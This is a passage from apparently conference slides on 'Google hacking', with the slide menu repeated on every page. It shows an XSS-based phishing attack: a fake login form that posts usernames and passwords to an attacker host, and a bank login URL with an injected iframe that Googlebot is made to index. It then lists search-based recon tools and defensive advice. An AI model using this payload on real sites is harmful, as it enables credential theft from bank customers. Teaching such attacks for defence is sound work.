--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot Google Hacking Tools

--------------------------------

Cross  Site  Framing  via  Googlebot  

And the file 2.html <form method=“post” action=“http://www.social.com/1.php>

Username: <input type=“text” name=“user”><br> Password: <input type=“password” name=“pass”>

<input type=“submit” value=“Send”> </form>

Then upload All The Files to: http://www.social.com/

Page 57: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot!Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot Google Hacking Tools

--------------------------------

Cross  Site  Framing  via  Googlebot  

After a few days GoogleBot will index the file: http://www.social.com/1.html

Then will index the link “CITEC Bank”(that within the file):

http://www.CITEC.com/bank/Login.asp?MsgError=<iframe src=‘http://www.social.com/2.html’></iframe>

Page 58: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot!Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot Google Hacking Tools

--------------------------------

Cross  Site  Framing  via  Googlebot  

The users that search “CITEC Bank” will find the above link and when getting inside the link they will see this form:

The Result: Many Users are being Manipulated by the attacker which uses Google in order to execute a Phishing attack (with XSS).

Page 59: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools!

Google  Hacking  Database  (GHDB)!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 60: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools!

Gooscan !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 61: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools!

SiteDigger  Tools !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 62: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools!

Goolink  –  This  is  very  handy  for  finding  vulnerable  site  wide  open  to  google  and  googlebots!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 63: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools!

GoolagScanner  –  Enable  to  Audit  Website  via  Google!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 64: CITEC #CON2-Dirty Attack with Google Hacking

Spike Bot – (By Me ) !

Google  Links  with  Spike  Bot !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 65: CITEC #CON2-Dirty Attack with Google Hacking

How to Protect Google Hacking!

  Keep sensitive data off the web   Use common sense!! Basic security practices is all it

takes. Defense in depth, act diligently when configuring web based devices and have a strong corporate security policy

  Use Google hacking techniques to uncover your own security problems. So…..Google hack yourself!

  Perform periodic Google Assessments –  Update robots.txt –  Use meta-tags: NOARCHIVE –  http://www.google.com/remove.html

  Work with Google for help in removing security breaches. They are easy to work with and want to help! You can find contact info on their site

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 66: CITEC #CON2-Dirty Attack with Google Hacking

If someone is still in the room.. Q & A!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

THANK YOU